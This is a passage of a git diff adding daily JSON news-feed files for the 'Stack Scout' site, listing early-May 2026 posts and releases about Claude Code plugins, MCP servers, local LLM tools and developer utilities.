a local JSON file (or shares with another memory plugin via $TIME\\_ANCHOR\\_MEMORY\\_PATH) \\- \\~85% of users get auto-detected (Windows tzutil, Linux /etc/localtime, $TZ). The remaining 15% type a city/country and get a paginated picker \\- covering \\~200 countries with their full IANA zone lists. Free + open source. MIT licensed, no telemetry, all state local. No paid tier, nothing to sign up for. #### Install (any OS, no git, no SSH, no plugin marketplace setup): **Windows (PowerShel…", + "category": "ai_tools" + }, + { + "title": "Parallelogram – a strict linter for LLM fine-tuning datasets (catches broken data before your GPU run starts)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t1sf5z/parallelogram_a_strict_linter_for_llm_finetuning/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-02T15:07:24.000Z", + "summary": "Fine-tuning frameworks assume your data is correctly formatted. None of them enforce it. The result is broken training runs discovered after the compute is spent.\n\nParallelogram is a CLI tool that validates fine-tuning datasets before any training starts. Strict hard-blocks on role sequence errors, empty turns, context window violations, duplicates, and mojibake. Exits 0 on clean data, exits 1 on errors — CI/CD friendly.\n\nApache 2.0, local-first, zero network calls.\n\ngithub.com/Thatayotlhe04/Par", + "category": "creative_tools" + }, + { + "title": "Tried running Claude Code with local LLMs via Ollama — ended up subscribing to Pro anyway. But now I can't disconnect from the local server.", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1vjd0/tried_running_claude_code_with_local_llms_via/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-02T17:07:21.000Z", + "summary": "I've been experimenting with using Ollama to run Claude Code locally with models like Gemma 4, thinking I could avoid API costs. However, I quickly realised these models aren't really optimised for Claude Code's agentic workflows — they tend to get stuck in thinking loops and don't follow Claude Code's expected output structure well. So I ended up subscribing to Claude Pro anyway. The problem now is that even after logging into my Anthropic account through the terminal, Claude Code still connects to the local Ollama server no matter how many times I restart the terminal or VSCode. Just wondering how this can be solved, and also is it possible to run both local LLMs and claude models at the same time?", + "category": "ai_tools" + }, + { + "title": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Archite…", + "url": "https://x.com/HudBeer/status/2050622456436818111", + "source": "X / @hudbeer", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-02T17:04:26.000Z", + "summary": "Tool orchestration > model benchmarks. MCP connects any model to any tool without API keys. That's the real shift: system design matters more than intelligence scores. Built 13 tools across Claude, Codex, local. Same shipping pace. Architecture wins.", + "category": "ai_tools" + }, + { + "title": "Weekly Meal Planning Fully Automated with Claude and Migros MCP", + "url": "https://x.com/hslu_aiml/status/2049100936287498456", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T16:28:06.379Z", + "summary": "A developer automated their weekly meal plan entirely using Claude and Migros's MCP integration, demonstrating how AI agents can handle grocery and meal planning end-to-end.", + "category": "ai_tools" + }, + { + "title": "@ValsAI: GPT-5.5 Now #1 on Terminal Bench 2 — Updated Results Show +11% Improvement", + "url": "https://x.com/ValsAI/status/2050240263420072446", + "source": "Aligned News (Scoble)", + "tags": [ + "cli_tool", + "tool_update" + ], + "matching_tags": [ + "cli_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T16:21:16.690Z", + "summary": "Vals AI updated GPT-5.5's results and it is now the #1 model on Terminal Bench 2, improving by +11%. It remains #2 on the overall Vals Index.", + "category": "ai_tools" + }, + { + "title": "I built \"Semvec\": A Constant-Cost Semantic Memory for LLMs (Looking for testers!)", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1ti3q/i_built_semvec_a_constantcost_semantic_memory_for/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "agent_tool" + ], + "matching_tags": [ + "mcp", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-02T15:49:05.000Z", + "summary": "Hey everyone, If you build LLM applications, autonomous agents, or just use Claude/Cursor for coding, you've probably hit this wall: Conversation history grows infinitely, token costs explode, latency skyrockets, and eventually, the LLM starts forgetting early context anyway. To fix this, I built semvec. It replaces unbounded conversation histories with a fixed-size semantic state combined with a tiered, content-aware memory (short/medium/long-term). The result: The cost and latency of every LLM call stay constant. Turn 10 and Turn 10,000 carry the exact same input footprint. In 48-turn benchmarks, it yields roughly a 76% token reduction while retaining all structured access to decisions, error patterns, and prior context. Here is what you get: \\- Constant-size compressed context: Token-reduced LLM context that stops growing. \\- Tiered memory with selective forgetting: Frequently accessed older memories outlive never-touched newer ones. \\- Drop-in chat proxy: Wrap any OpenAI-compatible LLM (vLLM, Ollama, OpenRouter) and get compressed context for free. \\- Coding-agent compaction (MCP): Persistent memory across coding sessions. It comes with an MCP server for Claude Code & Curs…", + "category": "ai_tools" + }, + { + "title": "The OpenAI Prompting Guide Has Been Updated. 🙌🏻 Check It Out 👏🏻", + "url": "https://reddit.com/r/ChatGPT/comments/1t1tgok/the_openai_prompting_guide_has_been_updated_check/", + "source": "Reddit r/ChatGPT", + "tags": [ + "api_update", + "tool_update" + ], + "matching_tags": [ + "api_update", + "tool_update" + ], + "importance": 1, + "date": "2026-05-02T15:47:33.000Z", + "summary": "A great resource for learning how to prompt better and get the most out of ChatGPT 5.5: https://developers.openai.com/api/docs/guides/prompt-guidance?model=gpt-5.5 🤙🏻", + "category": "ai_tools" + }, + { + "title": "I reverse-engineered the Perplexity app and built an MCP that turns your Perplexity/Comet account into a Claude MCP, so Claude can search like crazy and read 200+ sources in one answer with your personal account subscription without API product needed. [Experiment - Educational Purpose]", + "url": "https://reddit.com/r/ClaudeAI/comments/1t1pdqc/i_reverseengineered_the_perplexity_app_and_built/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-02T13:05:38.000Z", + "summary": "Here's video showcase: [***https://youtu.be/wErgEe9Pgqo***](https://youtu.be/wErgEe9Pgqo)", + "category": "ai_tools" + }, + { + "title": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base t…", + "url": "https://x.com/genondemand3d/status/2050539325763293222", + "source": "X / @genondemand3d", + "tags": [ + "api_update", + "mcp" + ], + "matching_tags": [ + "api_update", + "mcp" + ], + "importance": 1, + "date": "2026-05-02T11:34:07.000Z", + "summary": "Kept having dreams last night about the game system... I think why this is weighing so heavy is because I don't want to launch with any Gemini api calls(cheap, fast, practically free but I dunno if scalable) so I'm actually building base training and mcp and hopefully it'll grow", + "category": "ai_tools" + }, + { + "title": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-tim…", + "url": "https://x.com/mehedi_u/status/2050462001571504588", + "source": "X / @mehedi_u", + "tags": [ + "api_update", + "product_launch" + ], + "matching_tags": [ + "api_update", + "product_launch" + ], + "importance": 1, + "date": "2026-05-02T06:26:51.000Z", + "summary": "xAI Launches Grok 4.3 with Low-Cost Voice Cloning API Elon Musk’s xAI has released Grok 4.3, featuring a new, high-fidelity voice cloning suite at a price point significantly lower than ElevenLabs or OpenAI. The release emphasizes real-time speed, targeting developers building", + "category": "ai_tools" + }, + { + "title": "Hermes Just Beat Claude Code in GitHub Stars and Nobody Is Talking About It", + "url": "https://x.com/aakashgupta/status/2050349093969694825", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T23:49:55.116Z", + "summary": "Braygent highlights the Hermes GitHub star milestone as the underreported open source AI agent story of the week, arguing it signals a turning point in open versus closed AI competition.", + "category": "ai_tools" + }, + { + "title": "Pika Just Let You Give Claude a Face and Make Videos Through Conversation", + "url": "https://x.com/pika_labs/status/2050294291998933455", + "source": "Aligned News (Scoble)", + "tags": [ + "mcp", + "tool_update" + ], + "matching_tags": [ + "mcp", + "tool_update" + ], + "importance": 1, + "date": "2026-05-01T23:49:55.116Z", + "summary": "Braygent highlights the Pika MCP as a genuinely new Claude integration category that gives the assistant a custom identity and full video production capabilities, not just tool access.", + "category": "ai_tools" + }, + { + "title": "NVIDIA's Open Source Enterprise AI Agent Security Layer Is More Important Than People Realize", + "url": "https://x.com/NVIDIAAI/status/2050336285428998202", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-01T23:49:55.116Z", + "summary": "Braygent argues NVIDIA's open source OpenShell is the infrastructure unlock for enterprise AI agent deployment, with the open source design being crucial for security team auditability.", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-03.json b/data/news-feed-2026-05-03.json new file mode 100644 index 0000000..d4165b8 --- /dev/null +++ b/data/news-feed-2026-05-03.json @@ -0,0 +1,247 @@ +{ + "generated": "2026-06-05T00:44:37.493Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-03", + "article_count": 15, + "archived_story_count": 379, + "articles": [ + { + "title": "EasyUI – built over many months, late nights, and real dedication. Now 100% open-source.", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2toa5/easyui_built_over_many_months_late_nights_and/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source", + "developer_tool" + ], + "matching_tags": [ + "open_source", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-03T18:40:22.000Z", + "summary": "• Run ComfyUI workflows (txt2img, img2img, img2vid, vid2vid and more) • Execute Python scripts • Chat with LLMs (Ollama) • Templates & favorite templates • Plugin system • Tag system, wildcards, chants • Mask editor & crop tool • Drawing & coloring tools (inpaint) • Sessions management • Dark mode & login system • Media upload (drag & drop) • Audio trimming & txt2voice • Multi-language (Arabic, English, Chinese, Japanese) • Edit & resend prompts • Regenerate & resend images • Negative prompt support • And much more... Made with effort. Released with love. 🔗 [https://github.com/kigy1/EasyUI]", + "category": "creative_tools" + }, + { + "title": "Hermes Agent Hit 100K GitHub Stars — The Fastest-Growing Open-Source AI Agent Has Won the Community", + "url": "https://x.com/Shaughnessy119/status/2042339593647800404", + "source": "Aligned News (Scoble)", + "tags": [ + "open_source", + "agent_tool" + ], + "matching_tags": [ + "open_source", + "agent_tool" + ], + "importance": 1, + "date": "2026-05-03T14:53:59.070Z", + "summary": "Braygent argues Hermes Agent's 100K GitHub stars represent a clear developer community vote for reliability over feature velocity, with implications for how all AI developer tools should prioritize update stability.", + "category": "ai_tools" + }, + { + "title": "Vibe coded and made a Knights of New Order like free open sourced tool for proof-checking deepbooru tags", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2kou2/vibe_coded_and_made_a_knights_of_new_order_like/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "product_launch", + "open_source" + ], + "matching_tags": [ + "product_launch", + "open_source" + ], + "importance": 1, + "date": "2026-05-03T12:54:04.000Z", + "summary": "\\--- **Deepbooru TagWalker Beta** **---** **Most tagging tools out there are image-centric** — you open an image, then edit its tags. TagWalker flips that around. You pick a tag. The program walks you through every image in your dataset, one by one, and asks: does this image have this tag correctly applied? Yes or No. Then it moves to the next image automatically. By the time you finish a tag, you've seen it against every single image in your dataset — consistently, in sequence, without losing your place. No clicking around. No forgetting which images you already checked. \\--- This is the program I had always wished existed. The program works the very similar way to **Knights of New Order** minigame on civit.AI. My first time ever vibe coding project with Qwen 3.6 27B Q4 on RTX 3090. Not as easy as I initially thought. Program is uploaded on github under MIT license. [https://github.com/Elliezrah/deepbooru-tagwalker/releases](https://github.com/Elliezrah/deepbooru-tagwalker/releases) Let me know what you think.", + "category": "creative_tools" + }, + { + "title": "OpenClaw v2026.5.2 released", + "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.5.2", + "source": "GitHub Releases · OpenClaw", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.91, + "date": "2026-05-02T23:37:55.000Z", + "summary": "\n### Highlights\n\n- External plugin installation, update, doctor repair, dependency reporting, and artifact metadata now cover the npm-first cutover, stale configured installs, missing package payloads, and beta-channel plugin fallback. Thanks @vincentkoc.\n- Gateway and agent hot paths are leaner across startup, session listing, task maintenance, prompt prep, plugin loading, tool descriptor planning, filesystem guards, and large runtime configs.\n- Control UI and WebChat are more resilient across ", + "category": "ai_tools" + }, + { + "title": "pnpm v11.0.4 released", + "url": "https://github.com/pnpm/pnpm/releases/tag/v11.0.4", + "source": "GitHub Releases · pnpm", + "tags": [ + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "developer_tool", + "cli_tool" + ], + "importance": 0.84, + "date": "2026-05-02T23:32:37.000Z", + "summary": "## Patch Changes\r\n\r\n* Fixed `pnpm ci` not reinstalling workspace package `node_modules` directories after the clean step [#11427](https://github.com/pnpm/pnpm/issues/11427).\r\n* Remove pnpm's workspace state file when cleaning node\\_modules so `pnpm ci` performs a fresh install after the clean step.\r\n* Do not remove `pnpm-lock.yaml` during `pnpm clean` when `lockfile: true` is configured in `pnpm-workspace.yaml`. The lockfile is only removed when the `--lockfile` option is passed to `pnpm clean`.", + "category": "ai_tools" + }, + { + "title": "Turbo v2.9.8 released", + "url": "https://github.com/vercel/turborepo/releases/tag/v2.9.8", + "source": "GitHub Releases · Turbo", + "tags": [ + "github_release", + "tool_update" + ], + "matching_tags": [ + "github_release", + "tool_update" + ], + "importance": 0.7, + "date": "2026-05-03T02:41:00.000Z", + "summary": "\n\n## What's Changed\n### @turbo/repository\n* chore: Update to Rust 1.95.0 by @ognevny in https://github.com/vercel/turborepo/pull/12636\n### Changelog\n* release(turborepo): 2.9.7 by @github-actions[bot] in https://github.com/vercel/turborepo/pull/12679\n* test: Add regression for gitignored output restore by @anthonyshew in https://github.com/vercel/turborepo/pull/12681\n* docs: Clarify root task guidance by @anthon", + "category": "ai_tools" + }, + { + "title": "Open Source AI Agents | Github/Repo List | [2025] Feb 21, 2025 • 31", + "url": "https://huggingface.co/blog/tegridydev/open-source-ai-agents-directory", + "source": "Hugging Face Blog", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T18:00:42.827Z", + "summary": null, + "category": "ai_models" + }, + { + "title": "Built this over the weekend because dataset prep was annoying af", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2sb82/built_this_over_the_weekend_because_dataset_prep/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T17:50:27.000Z", + "summary": "I’ve been working on my startup and had to train diffusion models for animations. Realized the worst part is not training, it’s the dataset prep. Especially with stuff like LTX models where things have to follow specific rules like frame counts (8n+1) and resolution constraints. You take random clips and almost nothing fits directly, so you end up trimming, resizing, fixing frames, adding captions… just a lot of repetitive work. So I built a tool for myself over the weekend to deal with it. It’s fully open source. Runs local-first with a simple UI + FastAPI backend, uses FFmpeg underneath. You basically drop your raw videos and it just handles all that stuff. Checks what’s wrong, fixes it, lets you tweak things if needed, and gives you a clean dataset ready for training. Also gives you a good level of control across the whole pipeline, so you’re not locked into rigid preprocessing. It also has bulk captioning feature across the dataset. Currently it supports LTX and WAN, and I’ll be adding support for more models soon. Been using it myself and it made things way smoother, so putting it out. Also I keep building similar small open source tools like this and putting them out. You’ll…", + "category": "creative_tools" + }, + { + "title": "I made an easy to use OPEN SOURCE, beautiful UI wrapper for ComfyUI without the node graph", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2s1yp/i_made_an_easy_to_use_open_source_beautiful_ui/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T17:40:48.000Z", + "summary": "soo I got into local ai image generation and saw that there was no truly simple generators that just had beautiful views for generating images, no complex stuff, so I decided to make my own and open source it of course on github the backend is fully comfyUI, but it has no node graphs, it just uses it because I love the backend and it works much easier then anything else for this I would love to have people review and contribute/find issues for this, heres some images of it but basically its called J AI Studio, and ive stripped it back to be as simple yet still great as possible, for anyone new to ai image gen OR just people who want less clutter/ugly UI's heres the github and some pics of it [https://github.com/jasperdevs/J-AI-Studio](https://github.com/jasperdevs/J-AI-Studio) [Main view](https://preview.redd.it/t786wcnikyyg1.png?width=1657&format=png&auto=webp&s=1900054e0ff13b094050769f15ab441ad0a13243) [\\\\\"Zen Mode\\\\\"](https://preview.redd.it/550ak82jkyyg1.png?width=1660&format=png&auto=webp&s=bdca9741ce07aecb6f6c6a179be0e4a0f4116b24) [Fullscreen on an image](https://preview.redd.it/p4spphgkkyyg1.png?width=1328&format=png&auto=webp&s=18f2c3442…", + "category": "creative_tools" + }, + { + "title": "Can I ask a noob question?", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2rilm/can_i_ask_a_noob_question/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T17:21:05.000Z", + "summary": "Hello all, I am extremely new to this AI video generation realm. Till now I was just generating images with Gemini (nano banana). While looking for video generations I saw higgsfield and eleven labs, but I can't pay for the steep prices. While looking for open source options, I found this sub. I have seen mentions of LTX and Wan for video generations. Does this sub has a beginner guide or something? If not can anyone guide me onto making good AI videos for instagram? Thank you.", + "category": "creative_tools" + }, + { + "title": "Built a local LLM inference engine on CachyOS — runs faster than llama.cpp on my 9070 XT", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2nm4u/built_a_local_llm_inference_engine_on_cachyos/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-03T14:54:30.000Z", + "summary": "Hey folks, we've been hacking on a Vulkan-based LLM engine the last few weeks, figured I'd share since I'm running it exclusively on CachyOS with Mesa RADV. It's called VulkanForge — single 14 MB Rust binary, no Python, no ROCm, just pure Vulkan compute shaders. Runs GGUF models (Q4\\_K\\_M etc.) and also native FP8 SafeTensors which llama.cpp can't even load. Some numbers on my RX 9070 XT (RADV Mesa 26.0.6): * Qwen3-8B Q4\\_K\\_M: 134 tok/s decode (llama.cpp does \\~129) * Mistral-7B: 132 tok/s (llama.cpp \\~124) * Native FP8 Llama-3.1-8B: 68 tok/s in 7.5 GB VRAM Everything works out of the box on CachyOS — just `cargo build --release` and go. No weird driver hacks needed, fish shell works fine too lol. GitHub: [https://github.com/maeddesg/vulkanforge](https://github.com/maeddesg/vulkanforge) Happy to answer questions if anyone wants to try it on their RDNA4 setup.", + "category": "creative_tools" + }, + { + "title": "Side-by-side comparison of Qwen-Image, ERNIE Base/Turbo, and FLUX.2 Dev across 8 custom styles (single RTX 5090)", + "url": "https://reddit.com/r/StableDiffusion/comments/1t2nkkt/sidebyside_comparison_of_qwenimage_ernie/", + "source": "Reddit r/StableDiffusion", + "tags": [ + "open_source" + ], + "matching_tags": [ + "open_source" + ], + "importance": 1, + "date": "2026-05-03T14:52:46.000Z", + "summary": "Hey folks. I've been playing around at home picking which open-source image model to settle on for some prototyping work, and ended up doing a fun little side-by-side that maybe someone else will find useful. Same prompt and same seed across four models, with eight different style presets (AI generated). Completely amateur — no benchmarking rigor, just curiosity and a free weekend. # Tested models * **Qwen-Image-2512** (BF16) with **Qwen2.5-VL-7B** NVFP4 scaled text encoder * **ERNIE-Image Base** (BF16) with **Ministral 3 3B** text encoder * **ERNIE-Image Turbo** (BF16, 8-step DMD-distilled) with **Ministral 3 3B** text encoder * **FLUX.2 Dev** (NVFP4 mixed) with **Mistral 3 Small** (flux2 type, FP4 mixed) text encoder # Hardware * **GPU**: NVIDIA RTX 5090 (32 GB VRAM) * **CPU**: AMD Ryzen 9 9950X3D * **RAM**: 64 GB DDR5 # Notes Settings are whatever I found ideal for my hardware after a fair bit of trial and error — these are not necessarily community defaults, just what worked best on my machine. * **Qwen-Image** and **FLUX.2 Dev NVFP4** both spill heavily into system RAM during inference. They fill almost the entire VRAM and most of the system RAM at once. * **Qwen-Image-2512**…", + "category": "creative_tools" + }, + { + "title": "@Scobleizer Shares Full Resume of AI Industry Work in Response to Being Challenged", + "url": "https://x.com/Scobleizer/status/2050740859789103142", + "source": "Aligned News (Scoble)", + "tags": [ + "product_launch" + ], + "matching_tags": [ + "product_launch" + ], + "importance": 1, + "date": "2026-05-03T14:52:14.377Z", + "summary": "Scoble summarized his AI industry credentials: most complete X lists, alignednews.com news service, entrepreneur interviews, multiple company launches, and eight books about the future. The response provides a concise overview of his information infrastructure and editorial brand.", + "category": "ai_tools" + }, + { + "title": "What if ChatGPT launched in 1998", + "url": "https://reddit.com/r/ChatGPT/comments/1t2l80n/what_if_chatgpt_launched_in_1998/", + "source": "Reddit r/ChatGPT", + "tags": [ + "tool_update" + ], + "matching_tags": [ + "tool_update" + ], + "importance": 1, + "date": "2026-05-03T13:16:47.000Z", + "summary": "Saw the Wikipedia premium screenshot and it got me thinking… Enjoy ✌️", + "category": "ai_tools" + }, + { + "title": "Set up multi-agent orchestration with Claude Code as the boss... am I overcomplicating this?", + "url": "https://reddit.com/r/ClaudeAI/comments/1t2i664/set_up_multiagent_orchestration_with_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "cli_tool" + ], + "matching_tags": [ + "cli_tool" + ], + "importance": 1, + "date": "2026-05-03T10:49:45.000Z", + "summary": "Pretty new to AI but been deep on a side project for a while now. Got tired of one Claude session running out of context halfway through anything serious, so I rigged up an orchestration thing. Working well enough but I have no idea if I'm just reinventing the wheel. Setup looks like this: ( Please note it's work paying for all these , I wouldn't be spending my own money having this many agents etc ) **Main orchestrator**: Claude Code running Opus 4.7 (1M context, high effort) Premium team seat. This one talks to me, plans the work, reviews everything that comes back, decides what to fan out. Anything sensitive (auth, payments, db migrations, anything where conversation history matters) it does itself. **Subagents :** all called from bash via wrapper scripts in ./agents/: * **claude-sub** : another Claude Code (Opus 4.7 High) premium team seat on a worker account so my main quota isn't drained. Fresh context. Used for \"review your own diff with fresh eyes\" or well-specified subtasks. * **codex:** GPT-5.5 via Codex CLI. Team plan . Mostly the per-task reviewer with mocks attached via --image. * **codex-sub:** GPT-5.5 via Codex CLI. Team plan. Because with work I have the two accoun…", + "category": "ai_tools" + } + ] +} \ No newline at end of file diff --git a/data/news-feed-2026-05-04.json b/data/news-feed-2026-05-04.json new file mode 100644 index 0000000..d34c400 --- /dev/null +++ b/data/news-feed-2026-05-04.json @@ -0,0 +1,263 @@ +{ + "generated": "2026-06-05T00:44:37.711Z", + "generatedBy": "Studio news backfill", + "site": "Stack Scout", + "date": "2026-05-04", + "article_count": 15, + "archived_story_count": 617, + "articles": [ + { + "title": "Local MCP server that tells Claude Code what would break before it edits a file (raysense, MIT, free)", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3jhnz/local_mcp_server_that_tells_claude_code_what/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-04T14:33:50.000Z", + "summary": "A pattern I keep hitting in Claude Code: I ask the agent to refactor something modest -- a parsing utility, a helper, a config loader -- and the diff it produces looks fine. Tests in the file pass. I run CI and three unrelated tests blow up. Sometimes the broken caller is code I have not touched in months. The agent is not careless. It read the file. What it could not do was *see the codebase*: the dependency graph, the call sites, the modules that lean on each other, the cycles, the test coverage of each piece. Plain text never reveals this. You cannot grep your way to \"what would break if I delete this function.\" We built **raysense** to close that gap. It is a single Rust binary + Claude Code plugin + stdio MCP server that gives Claude structural memory of your codebase. **Free, MIT-licensed, local-only -- no SaaS, no API key, no telemetry.** It ships from crates.io and builds from source on first install, so the only prerequisite is a Rust toolchain (`cargo`) on the machine. If you don't have it yet: ``` curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh ``` After that, `cargo install raysense` is the whole installation. (Disclosure: I am part of the team behind it…", + "category": "ai_tools" + }, + { + "title": "claudely: launch Claude Code against Local LLM provider like LM Studio / Ollama / llama.cpp without trashing your real claude config", + "url": "https://reddit.com/r/ClaudeAI/comments/1t38e7c/claudely_launch_claude_code_against_local_llm/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "matching_tags": [ + "api_update", + "mcp", + "developer_tool", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-04T05:19:34.000Z", + "summary": "Plenty of CLI coding agents will talk to a local LLM, but the catch is the ecosystem. Skills, slash commands, MCP servers, plugins, hooks: all the interesting tooling has been built specifically for Claude Code, and parity on every other agent is patchy at best. Trying to reuse a Claude-shaped workflow on a different agent quickly turns into \"rewrite all the plugins\" or \"do without.\" claudely skips that fight. You keep Claude Code as the client (and its whole plugin / skill / MCP ecosystem with it), and just point it at a model running on your own hardware. Pick a provider, claudely spawns \\`claude\\` with the right base URL, auth, and cache fix wired up for that one session. Your shell and the regular \\`claude\\` command stay untouched, so you can flip between local and the real Anthropic API without thinking about it. It also quietly fixes a prompt-cache bug that otherwise tanks local-model speed by \\~90%, and handles the per-provider env-var differences for you. Works with LM Studio, Ollama, llama.cpp, or any Anthropic-compatible endpoint (point it at a litellm or claude-code-router proxy for OpenAI-protocol backends like vLLM). npm i -g claudely claudely # LM Studio, picker over…", + "category": "ai_tools" + }, + { + "title": "Releasing the Data Analyst Augmentation Framework (DAAF) version 2.1.0 today -- still fully free and open source! In my very biased opinion: DAAF is now finally the best, safest, AND easiest way to get started using Claude Code for respons…", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3ryo1/releasing_the_data_analyst_augmentation_framework/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "matching_tags": [ + "open_source", + "developer_tool", + "tool_update" + ], + "importance": 1, + "date": "2026-05-04T19:28:17.000Z", + "summary": "https://preview.redd.it/o74lppqd86zg1.png?width=1456&format=png&auto=webp&s=3a904bae42b8130e2c6382be55debe8f6ef4d6ca When I launched the Data Analyst Augmentation Framework [v2.0.0 six weeks ago](https://daafguide.substack.com/p/daaf-v200-is-finally-here-from-usable), I wrote that the major update was about going “from usable to useful” -- rebuilding the orchestrator system for maximum flexibility and efficiency, adding a variety of more responsive engagement modes, and deepening the roster of methodological knowledge that DAAF could pull upon as needed for causal inference, geospatial analysis, science communication and data visualization, supervised and unsupervised machine learning, and much, much more. But while DAAF continued to get more capable and more useful for those actually using it… Well, it was still extremely annoying to use, generally obtuse, and hard to get started with, which means a lot of people who were interested were simply bouncing off of it. **That all changes with the v2.1.0 update**, which I’m cheekily calling the Frictionless Update for three key reasons: # 1. Installation happens in one line now From a fresh computer to talking with a DAAF-e…", + "category": "ai_tools" + }, + { + "title": "Top 6 Claude Skills: 15th April to 3rd May", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3qmqy/top_6_claude_skills_15th_april_to_3rd_may/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "open_source", + "cli_tool" + ], + "matching_tags": [ + "open_source", + "cli_tool" + ], + "importance": 1, + "date": "2026-05-04T18:42:21.000Z", + "summary": "Found some Open Source Claude skills from last 15 days. Some of them are pretty decent to use, personally liked the npm downloads one. Check out: **- brand-alchemy:** A brand strategy and naming skill that interrogates your thoughts for branding first, then applies phonosemantics, category design frameworks, and auto-checks domain availability across any TLD. **- npm-downloads-to-leads:** Give it a list of npm packages. It pulls 12 weeks of download data, scores each one by growth velocity, maps maintainers to GitHub and X, and gives you a ranked lead brief who built it, how to reach them, and what to say. **- hyperframes:** Write HTML, render video. Built for agents. Handles HTML-to-video rendering with ffmpeg, GSAP animations, and puppeteer automation great for auto-generating video content from code. **- email-newsletter:** Draft and design a complete HTML email newsletter from a topic or content brief. Paste-ready output for Loops, Mailchimp, Beehiiv, Resend, and most email platforms. **- pricing:** Help figure out pricing for a product or service using minimalist entrepreneur principles. Comes straight from the book 'The minimalist Entrepreneur\" playbook cost-based, value-bas…", + "category": "ai_tools" + }, + { + "title": "built a plugin so my parallel Claude Code sessions can message each other instead of me alt-tabbing", + "url": "https://reddit.com/r/ClaudeAI/comments/1t3osat/built_a_plugin_so_my_parallel_claude_code/", + "source": "Reddit r/ClaudeAI", + "tags": [ + "mcp", + "developer_tool" + ], + "matching_tags": [ + "mcp", + "developer_tool" + ], + "importance": 1, + "date": "2026-05-04T17:38:22.000Z", + "summary": "I usually have two or more Claude Code sessions open at once. One in the backend repo, one in the frontend. Half the time I'd be in the frontend asking \"wait, what shape did the user object end up as?\", then alt-tab, ask the backend session, copy the answer, alt-tab back, paste. The other Claude was right there. It already knew. I was the bottleneck. So I wrote a plugin called Relay. In the frontend window I just say: ▎ask the backend session what the user object looks like The backend session sees the question between turns, answers it, and the reply pops up in my frontend session as a notification. No window switching. No copy-paste. Works for broadcasts too, like \"ask everyone what they're working on\", and the replies trickle in one at a time. The mechanism is simpler than it sounds. Claude Code shipped a channels capability a while back that lets MCP servers push messages into a session between turns. Relay piggybacks on that. Each session runs a tiny MCP server, a single hub daemon on your machine routes between them over a unix socket, and inbound asks land as channel notifications so Claude reacts to them naturally on its next turn. First session you start spawns the hub. I…", + "category": "ai_tools" + }, + { + "title": "Your Claude Code agent is 